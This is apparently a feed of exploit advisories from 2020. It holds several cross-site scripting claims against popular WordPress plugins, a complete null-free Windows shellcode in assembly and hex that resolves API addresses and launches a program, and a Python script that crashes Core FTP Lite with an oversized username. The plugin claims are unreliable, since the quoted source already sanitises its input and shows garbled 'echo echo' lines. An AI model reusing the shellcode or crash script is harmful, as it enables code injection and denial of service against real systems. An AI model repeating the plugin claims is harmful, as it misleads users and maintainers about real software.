WordPress Wordfence plugin version 7.4.6 suffers from a cross site scripting vulnerability.

MD5 | 4c4a19b487de18d919fa7c64af08c127

[-] Title : word press plugin wordfence 7.4.6 - Cross-Site Scripting
[-] Author : MEHRAN_FEIZI
[-] Vendor : https://wordpress.org/plugins/wordfence/
[-] Tested on : Windows
[-] Category : Webapps
[-] Date : 2020-02-20
=====================================================================================================
Vulnerable page :
wordfence/lib/diffResult.php
======================================================================================================
Vulnerable Source :
19: echo echo wp_kses($_GET['file'], array()
=======================================================================================================
POC :
http://localhost/wp-content/plugins/wordfence/lib/diffResult.php?file=[XSS]
=======================================================================================================
************************
* ==> Contact With We :
* Telegram : @MF0584
* Email : mehranfeizi13841384@gmail.com
************************

Source

WordPress WooCommerce plugin version 3.9.2 suffers from a cross site scripting vulnerability.

MD5 | 94820451c430b8a8ed5f6fd5526603f8

[-] Title : word press plugin woocommerce 3.9.2 - Cross-Site Scripting
[-] Author : MEHRAN_FEIZI
[-] Vendor : https://wordpress.org/plugins/woocommerce/
[-] Tested on : Windows
[-] Category : Webapps
[-] Date : 2020-02-20
=====================================================================================================
Vulnerable page :
woocommerce/includes/admin/class-wc-admin-attributes.php
======================================================================================================
Vulnerable Source :
189: echo echo absint($edit);
163: $edit = absint($_GET['edit']) : 0;
=======================================================================================================
POC :
http://localhost/wp-content/plugins/woocommerce/includes/admin/class-wc-admin-attributes.php?edit=[XSS]
=======================================================================================================
************************
* ==> Contact With We :
* Telegram : @MF0584
* Email : mehranfeizi13841384@gmail.com
************************

Source

WordPress TinyMCE-Advanced plugin version 5.3.0 suffers from a cross site scripting vulnerability.

MD5 | 19b95d8771354cf5f9950a9c29d5c8f0

[-] Title  : word press plugin tinymce-advanced 5.3.0 - Cross Site Scripting
[-] Author : MEHRAN_FEIZI
[-] Vendor : https://wordpress.org/plugins/tinymce-advanced/
[-] Category : Webapps
[-] Date : 2020-02-20
==============================================================================================
Vulnerable Page:
tinymce-advanced/insert-html-snippet/admin/snippets.php
==============================================================================================
Vulnerable Source:
200: echo echo esc_attr($search_name);
166: $search_name = sanitize_text_field($_POST['snippet_name']); //
if(isset($_POST)),
===============================================================================================
POC :
http://localhost/wp-content/plugins/tinymce-advanced/insert-html-snippet/admin/snippets.php

step 1 = Go To Web Page =
http://localhost/wp-content/plugins/tinymce-advanced/insert-html-snippet/admin/snippets.php

Step 2 = In the box : "snippet_name"
Step 3 = input box , Add JavaScript Code : alert('XSS')
===============================================================================================
************************
* ==> Contact With We :
* Telegram : @MF0584
* Email : mehranfeizi13841384@gmail.com
************************

Source

WordPress Really-Simple-SSL plugin version 3.2.9 suffers from a cross site scripting vulnerability.

MD5 | 15d5b82236c6e9225a6320e5cee222b2

[-] Title : word press plugin really-simple-ssl 3.2.9 - Cross-Site Scripting
[-] Author : MEHRAN_FEIZI
[-] Vendor : https://wordpress.org/plugins/really-simple-ssl/
[-] Tested on : Windows
[-] Category : Webapps
[-] Date : 2020-02-20
=====================================================================================================
Vulnerable page :
really-simple-ssl/class-admin.php
======================================================================================================
Vulnerable Source :
3979: echo echo "var setting_name = '$setting_name'" . ";";
3978: $setting_name = sanitize_text_field($_GET['highlight']);
=======================================================================================================
POC :
http://localhost/wp-content/plugins/really-simple-ssl/class-admin.php?highlight=[XSS]
=======================================================================================================
************************
* ==> Contact With We :
* Telegram : @MF0584
* Email : mehranfeizi13841384@gmail.com
************************

Source

223 bytes small dynamic, null-free popcalc shellcode.

MD5 | 6f8a6802f04b26ff3724b05afb440805

; Shellcode Title:  Dynamic, Null-Free PopCalc Shellcode (223 Bytes)
; Shellcode Author: Bobby Cooke
; Technique: PEB & Export Directory Table
; Tested On: Windows 10 Pro (x86) 10.0.18363 Build 18363

# Create a new stack frame
push ebp ; push current base pointer to the stack
mov ebp, esp ; Set Base Stack Pointer for new Stack-Frame
sub esp, 0x30 ; Decrement the stack by 96 to create space for saving pointers

# Push string "GetProcAddress",0x00 onto the stack
xor eax, eax ; clear eax register
mov ax, 0x7373 ; AX is the lower 16-bits of the 32bit EAX Register
push eax ; ss : 73730000 // EAX = 0x00007373 // x73=ASCII "s"
push 0x65726464 ; erdd : 65726464 // "GetProcAddress"
push 0x41636f72 ; Acor : 41636f72
push 0x50746547 ; PteG : 50746547
mov [ebp-0x4], esp ; save PTR to string at bottom of stack (ebp)

# Find Base Address of the kernel32.dll Dynamically Linked Library
xor eax, eax ; clear eax register
mov eax, [fs:eax+0x30] ; EAX = Address_of_PEB
mov eax, [eax+0xc] ; EAX = Address_of_LDR
mov eax, [eax+0x1c] ; EAX = First Entry of InInitialzationOrderModuleList - ntdll.dll
mov ebx, eax ; Get the second entry in the Initialization Order Module List (kernelbase.dll)
mov eax, [ebx] ; EAX = Second Entry of InInitialzationOrderModuleList - kernelbase.dll
mov ebx, eax ; Get the third entry in the Initialization Order Module List (kernel32.dll)
mov eax, [ebx] ; EAX = Third Entry of InInitialzationOrderModuleList - kernel32.dll
mov eax, [eax+0x8] ; move the kernel32.dll base address into the EAX register
; EAX = Base address of kernel32.dll
mov [ebp-0x8], eax ; Save the base address of kernel32.dll in the 2nd from bottom position on our stack

# Find Base Address of GetProcAddress Symbol
mov ebx, [eax+0x3c] ; save Relative Virtual Address (RVA/Offset) of New_Exe_Header to ebx.
add ebx, eax ; EBX = Address of new Header
mov ebx, [ebx+0x78] ; (RVA of New Exe Header) + 0x78 = RVA of Export-Table
add ebx, eax ; EBX now holds the address of the Export Table for kernel32.dll
mov edi, [ebx+0x20] ; PTR to RVA of Name-Pointer Table
add edi, eax ; (kernel32.dll baseAddr) + (RVA Name-Pointer Table) = Address of Name-Pointer Table
mov [ebp-0xC], edi ; save Address of Name-Pointer Table in the 3rd from bottom position in our stack-frame
mov ecx, [ebx+0x24] ; PTR to RVA of Ordinal Table
add ecx, eax ; (kernel32.dll baseAddr) + (RVA Ordinal Table) = Address of Ordinal Table
mov [ebp-0x10], ecx ; save PTR to Ordinal Table Address at 4th from bottom of stack (ebp-16)
mov edx, [ebx+0x1c] ; PTR to RVA of Address Table
add edx, eax ; (kernel32.dll baseAddr) + (RVA Address Table) = Address of Address Table
mov [ebp-0x14], edx ; save PTR to Address Table Address at 5th from bottom of stack (ebp-20)
mov edx, [ebx+0x14] ; Value of Number of Functions/Symbols within the Tables
xor eax, eax ; Counter = 0
loop:
mov edi, [ebp-0xC] ; Address of the Name-Pointer Table
mov esi, [ebp-0x4] ; PTR to string "GetProcAddress",0x00
xor ecx, ecx ; clear ecx register -- used for counters/loops
cld ; clear direction flag, DF=0 -- Process strings from left to right
mov edi, [edi+eax*4] ; Entries in Name Pointer Table are 4 bytes long
; edi = RVA of Nth entry = (Address of Name-Pointer Table) + (Counter * 4)
add edi, [ebp-0x8] ; edi = address of string = (kernel32.dll base addr) + (RVA of Nth entry)
add cx, 0xf ; ecx = length of string to compare = sizeof("GetProcAddress") = 15 (14 Letters + 1 String Terminator Char)
repe cmpsb ; compare first 15 bytes of string. esi cmp edi
; if equal ZF=1, if not ZF=0
jz found ; if strings match end loop, else increment eax and loop again
inc eax ; counter ++
cmp eax, edx ; check if eax = Value of Number of Functions/Symbols within the Tables
jb loop ; If eax != edx, restart the loop

found:
; The Counter (eax) now holds the position of GetProcAddress within the table
mov ecx, [ebp-0x10] ; ecx = Address of Ordinal Table
mov edx, [ebp-0x14] ; edx = Address of Address Table
mov ax, [ecx + eax*2] ; ax = ordinal number = (Address of Ordinal Table) + (counter * 2)
mov eax, [edx + eax*4] ; eax = RVA of function = var20 + (ordinal * 4)
add eax, [ebp-0x8] ; eax = address of GetProcAddress = (RVA of GetProcAddress) + (kernel32.dll base addr)
; Address of GetProcAddress is now in EAX
mov [ebp-0x18], eax ; save Address of GetProcAddress onto Stack 0x18=24; 6th from bottom

; Call GetProcAddress(hModule &kernel32.dll, lpProcName "WinExec")
; hModule: address of the DLL module that contains the function.
; lpProcName: A Pointer to the beginning of an ASCII string of the functions name; null terminated.
mov edx, 0x63657878 ; "xxec"
shr edx, 8 ; edx = "xec",0x00 // shr edx, 8 = Shifts the edx register to the right 8 bits
push edx
push 0x456e6957 ; EniW : 456e6957
push esp ; $lpProcName -- push the address of the start of the string onto the stack
push dword [ebp-0x8] ; $hModule -- push base address of kernel32.dll to the stack
mov eax, [ebp-0x18] ; Move the address of GetProcAddress into the EAX register
call eax ; Call the GetProcAddress Function.
; The address of the queried function is returned into the EAX register.
mov [ebp-0x1c], eax ; save Address of WinExec onto Stack 0x1c=28; 7th from bottom

; Call WinExec( LPCSTR lpCmdLine, UINT uCmdShow );
; lpCmdLine = "calc.exe" # String to program path
; uCmdShow = 0x00000001 # SW_SHOWNORMAL - displays a window
xor ecx, ecx ; clear eax register
push ecx ; string terminator 0x00 for "calc.exe" string
push 0x6578652e ; exe. : 6578652e
push 0x636c6163 ; clac : 636c6163
mov eax, esp ; save pointer to "calc.exe" string in eax
inc ecx ; uCmdShow SW_SHOWNORMAL - 0x00000001
push ecx ; uCmdShow *ptr to stack in 2nd position - LIFO
push eax ; lpcmdLine *ptr to stack in 1st position
mov eax, [ebp-0x1c] ; Move the address of WinExec into the EAX register
call eax ; Call the WinExec Function.

; Call GetProcAddress(hModule &kernel32.dll, lpProcName "ExitProcess")
xor ecx, ecx
mov ecx, 0x73736501 ; 73736501 = "sse",0x01 // "ExitProcess",0x0000 string
shr ecx, 8 ; ecx = "ess",0x00 // shr shifts the register right 8 bits
push ecx ; sse : 00737365
push 0x636f7250 ; corP : 636f7250
push 0x74697845 ; tixE : 74697845
push esp ; push pointer to string to stack for 'ExitProcess',0x00
push dword [ebp-0x8] ; push base address of kernel32.dll to stack
mov eax, [ebp-0x18] ; PTR to GetProcAddressA to EAX
call eax ; GetProcAddressA(PTR *kernel32.dll, "ExitProcess"0x00)
; EAX = ExitProcess Address
mov [ebp-0x20], eax ; save Address of ExitProcess onto Stack 0x54=84

; Call ExitProcess(ExitCode)
xor edx, edx
push edx ; ExitCode = 0
mov eax, [ebp-0x20] ; ExitProcess(ExitCode)
call eax

# Compiled on Kali with nasm
; nasm -f win32 dynaCalc.asm -o dynaCalc.o
; for i in $(objdump -D dynaCalc.o | grep "^ " | cut -f2); do echo -n 'x'$i; done; echo
; RAW:
; 5589e583ec3031c066b8737350686464726568726f634168476574508965fc31c0648b40308b400c8b401c89c38b0389c38b038b40088945f88b583c01c38b5b7801c38b7b2001c7897df48b4b2401c1894df08b531c01c28955ec8b531431c08b7df48b75fc31c9fc8b3c87037df86683c10ff3a674054039d072e48b4df08b55ec668b04418b04820345f88945e8ba78786563c1ea08526857696e4554ff75f88b45e8ffd08945e431c951682e6578656863616c6389e04151508b45e4ffd031c9b901657373c1e908516850726f63684578697454ff75f88b45e8ffd08945e031d2528b45e0ffd0
; Python/C format:
; "x55x89xe5x83xecx30x31xc0x66xb8x73x73x50x68x64x64x72x65x68x72x6fx63"
; "x41x68x47x65x74x50x89x65xfcx31xc0x64x8bx40x30x8bx40x0cx8bx40x1cx89"
; "xc3x8bx03x89xc3x8bx03x8bx40x08x89x45xf8x8bx58x3cx01xc3x8bx5bx78x01"
; "xc3x8bx7bx20x01xc7x89x7dxf4x8bx4bx24x01xc1x89x4dxf0x8bx53x1cx01xc2"
; "x89x55xecx8bx53x14x31xc0x8bx7dxf4x8bx75xfcx31xc9xfcx8bx3cx87x03x7d"
; "xf8x66x83xc1x0fxf3xa6x74x05x40x39xd0x72xe4x8bx4dxf0x8bx55xecx66x8b"
; "x04x41x8bx04x82x03x45xf8x89x45xe8xbax78x78x65x63xc1xeax08x52x68x57"
; "x69x6ex45x54xffx75xf8x8bx45xe8xffxd0x89x45xe4x31xc9x51x68x2ex65x78"
; "x65x68x63x61x6cx63x89xe0x41x51x50x8bx45xe4xffxd0x31xc9xb9x01x65x73"
; "x73xc1xe9x08x51x68x50x72x6fx63x68x45x78x69x74x54xffx75xf8x8bx45xe8"
; "xffxd0x89x45xe0x31xd2x52x8bx45xe0xffxd0"

Source

WordPress Prismatic plugin version 2.3 suffers from a cross site scripting vulnerability.

MD5 | a0d39eb5a5e494a8a016235265ecb650

[-] Title : word press plugin prismatic 2.3 - Cross-Site Scripting
[-] Author : MEHRAN_FEIZI
[-] Vendor : https://wordpress.org/plugins/prismatic /
[-] Tested on : Windows
[-] Category : Webapps
[-] Date : 2020-02-20
=====================================================================================================
Vulnerable page :
prismatic/inc/settings-display.php
======================================================================================================
Vulnerable Source :
35: echo echo $tab_active;
27: $tab_active = sanitize_text_field($_GET['tab']) : 'tab1';
=======================================================================================================
POC :
http://localhost/wp-content/plugins/prismatic/inc/settings-display.php?tab=[XSS]
=======================================================================================================
************************
* ==> Contact With We :
* Telegram : @MF0584
* Email : mehranfeizi13841384@gmail.com
************************

Source

WordPress Popup-Builder plugin version 3.61.1 suffers from a cross site scripting vulnerability.

MD5 | f7012987c3cc2c05c511a4205cca25c1

[-] Title : word press plugin popup-builder 3.61.1 - Cross-Site Scripting
[-] Author : MEHRAN_FEIZI
[-] Vendor : https://wordpress.org/plugins/popup-builder/
[-] Tested on : Windows
[-] Category : Webapps
[-] Date : 2020-02-20
=====================================================================================================
Vulnerable page :
popup-builder/com/classes/dataTable/Subscribers.php
======================================================================================================
Vulnerable Source :
141: echo echo $selectedDate; // AdminHelper.php
136: $selectedDate = esc_sql($_GET['sgpb-subscribers-date']);
=======================================================================================================
POC :
http://localhost/wp-content/plugins/popup-builder/com/classes/dataTable/Subscribers.php?sgpb-subscribers-date=[XSS]
=======================================================================================================
************************
* ==> Contact With We :
* Telegram : @MF0584
* Email : mehranfeizi13841384@gmail.com
************************

Source

Core FTP Liter version 1.3 suffers from a denial of service vulnerability.

MD5 | c595413a449072d8c312591dc40d5240

# Exploit Title : Core FTP Lite 1.3 - Denial of Service (PoC)
# Exploit Author: Berat Isler
# Date: 2020-02-20
# Vendor Homepage: http://www.coreftp.com/
# Software Link Download:http://tr.oldversion.com/windows/core-ftp-le-1-3cbuild1437
# Version: Core FTP 1.3cBuild1437
# Tested on : Windows 7 32-bit

# First step , Run exploit script, it will generate a new file with the name "mi.txt"
# Then start Core FTP application and find the "username" textbox.
# After that pate the content of "mi.txt" in to the "username" field like this --> "AAAAAAAAA"
# Don't need to click anything because application is already crash.

This is the code :


#!/usr/bin/python

b0f = "A" * 7000
payload = b0f
try:
f=open("mi.txt","w")
print "[+] Creating %s bytes payload generated .. .. .." %len(payload)
f.write(payload)
f.close()
print "[+] File created :) "
except:
print "File cannot be created :(("

Source

WordPress Ultimate-Member plugin version 2.1.3 suffers from a cross site scripting vulnerability.

MD5 | 3cbf268b58052c6f4f6bdd7d408ea24c

[-] Title  : word press plugin ultimate-member 2.1.3 - Cross Site Scripting
[-] Author : MEHRAN_FEIZI
[-] Vendor : https://wordpress.org/plugins/ultimate-member/
[-] Category : Webapps
[-] Date : 2020-02-20
==============================================================================================
Vulnerable Page:
ultimate-member/includes/admin/core/class-admin-settings.php
==============================================================================================
Vulnerable Source:
2876: echo echo wp_strip_all_tags($_POST['um-install-info']);
===============================================================================================
POC :
http://localhost/wp-content/plugins/ultimate-member/includes/admin/core/class-admin-settings.php

step 1 = Go To Web Page =
http://localhost/wp-content/plugins/ultimate-member/includes/admin/core/class-admin-settings.php

Step 2 = In the box : "um-install-info"

Step 3 = input box , Add JavaScript Code : alert('XSS')
===============================================================================================
************************
* ==> Contact With We :
* Telegram : @MF0584
* Email : mehranfeizi13841384@gmail.com
************************

Source